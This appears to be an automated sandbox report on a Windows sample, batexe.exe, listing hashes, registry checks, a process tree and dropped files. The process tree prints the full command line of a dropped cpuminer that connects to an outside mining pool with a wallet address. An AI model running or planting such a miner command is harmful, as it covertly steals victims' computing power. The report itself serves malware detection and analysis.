73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4388	b2e.exe
5840	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5840	cpuminer-sse2.exe
5840	cpuminer-sse2.exe
5840	cpuminer-sse2.exe
5840	cpuminer-sse2.exe
5840	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1672-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1672 wrote to memory of 4388	1672	batexe.exe	85
PID 1672 wrote to memory of 4388	1672	batexe.exe	85
PID 1672 wrote to memory of 4388	1672	batexe.exe	85
PID 4388 wrote to memory of 1640	4388	b2e.exe	86
PID 4388 wrote to memory of 1640	4388	b2e.exe	86
PID 4388 wrote to memory of 1640	4388	b2e.exe	86
PID 1640 wrote to memory of 5840	1640	cmd.exe	89
PID 1640 wrote to memory of 5840	1640	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1672
- C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\60EC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe

Filesize
13.8MB

MD5
61886b50887e3d2df383cc576fbed142

SHA1
16104ca0c52c7570cb9a201bc42a5a2b71620af9

SHA256
d414f7c759413933321e63e6882dcc58693cb58e08ac25591d5bb50956ef1d8c

SHA512
f80b4a7c4a8e2aeabbab6c97d3fb3e9973a1d70e08a56bec42cdf54c86fbb7bf8af4e3b785fd39a88750daff2bc8598ec4eb0850d6b569ee3408c6cd14b261d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe

Filesize
2.0MB

MD5
fdeff16ca964a2e9a2203979adac8aef

SHA1
63fd594b64440d14c8bbb531f900073ca93d6f24

SHA256
ec3b54b18cd56dc7a31df8ba96620e24f6ba98f305481e310b7f159ce544f7c7

SHA512
e892709e7c3ff823345cdbde2b4be9f51b3769456baed5ab824bda5ae849dbcff8c2a5750c7db79baa9636eda2542df5df5421b6e8629c827fa4db1abc188e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C78.tmp\b2e.exe

Filesize
2.9MB

MD5
9317cafb85becd9011ca213e7be3a2bc

SHA1
1c84c389734da0532809700191b96dc61527e382

SHA256
644eb7fd5f540a11f942d00b2233e715a40b8548294924fc054db1e08b293090

SHA512
65120a9f1410f4b9350788c5898557be3d3b195f03b3425895748764fc052048f38998bb455cef4f25f748c696821a9a4622c8f09f6ae4603dcd6882be451684

Download Submit
C:\Users\Admin\AppData\Local\Temp\60EC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
640KB

MD5
0f6af9e19fa927d88313e98d54420920

SHA1
0aff9c72864126107d6c630aafb9ed6512042afd

SHA256
71661d7077b93e2a5e53d7093e532bec1b66d34e3929bcb314eab7f431b84734

SHA512
bba078e2f4eb5ca45956657356f7419767a81679f34d9991bf28a1d44e412340d1002517f74a15583ffe20b32f1f25b60c47f4581100552dc1e651b3f88547be

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
648KB

MD5
d353ae695b529884d7f1662b9b1ff4ec

SHA1
b214051600c07fa4f7507edcce17653b89a6413d

SHA256
c9ef7d8b00a1f1d3400f568e1e3763e4e53e75e859ff6ed67db515632171d3c5

SHA512
df38cdacf786ca799144c11015e1ba7506935715c2c2c188e98bb9fdd4320285b3df65ef6f78794a393e042c5ccfc5b5a006864ea5638fefa06630580363f27b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
448KB

MD5
19a61444b6e2d01755ede80960bca19c

SHA1
e0c7222784d3e2b3329ec3280648b17fd60ef209

SHA256
13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

SHA512
bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
320KB

MD5
c911df8bf8c66277e14360319b0b93b7

SHA1
598c59c0e7cbecb788ee676db218dc0faaa39bdc

SHA256
4c53941f04ddeae2179047a1c7f8c7f7f46af0f08c424ab66d61f2316f2ee77d

SHA512
13aeae87ee52f22d1c928c99c66e116254cde630c09f90b146962fa61276af13fef653b7a66184d00d614f0379750e641c2e62326ebb5588ca632e56c935d77c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
512KB

MD5
6162b21c54b88c5c990e82aee951ebb4

SHA1
477384ab8ebe5f5a5d5a91603736d9ef53c12fd4

SHA256
462eb68967c7205145d0b92e4f3b69297f616187b07a189178f35f288063aff4

SHA512
6264ee49c4b8a6eaa69241e10ff9ab39445f85a57b756b8bc0530b45d77827d05e669dc06b689d4693db34e4161ef11b2cfe6f1954b0b90bcd434e81a938a40d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
256KB

MD5
f8edb8dd2fb15f1887ace09587589dd4

SHA1
cbf7cbfefc0215d9500a98d9064deb9e86787152

SHA256
0465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b

SHA512
aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
384KB

MD5
4cb3a8d3af58faf78da4dd33a03029db

SHA1
5356e4fb04a7047f6fc82a4e071e4803f97a0f3d

SHA256
86df790940bd442466ea58a434a31aaaadd1d23a9e9bf5e6fe625ff49049d620

SHA512
244237f4a13a7666e9f9592451dbb8bb18ca1f828d66f97e2890fa8f6be690d8890848102a8be253542c9f4b154d9f0e1aeeee5a867c866b78b64f9949f48c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
271KB

MD5
3775ecf6b30963770ca229ede1f0684a

SHA1
09daaa674a918a14bd7d767ee0fef9bee5b2bd5c

SHA256
ada7f0c9d3079cf230098148a6b75ce4d12e394d1e67daa410f843eade0745a2

SHA512
f31ab81a14c7abee59e560b6af6bd6ba422ec9d4a638b38e6bab670f5d0f1c9a0d40190bbb5fa52d8af94f8856267582c694279c28607ac03f007ccd3cde519f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
256KB

MD5
eca0c37eee65c31b869788d5d0bf00cd

SHA1
33a5c0cd2f0a7296a5c0169699ed8e065b57e5e8

SHA256
1d2b7bd4ddd99d627d5111252baadf028dc9910cf414892867502e5951de962e

SHA512
5f302da7772fca0a6d03ffd8732850f526acf5fcc33e189d2d906a33101454d970d5cca2f829a006d15c4a857341d72c7876cb2e7af84ada4f158695aba5a4dc

Download Submit
memory/1672-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4388-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4388-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5840-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5840-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-46-0x0000000073350000-0x00000000733E8000-memory.dmp

Filesize
608KB

Download
memory/5840-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5840-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5840-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5840-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download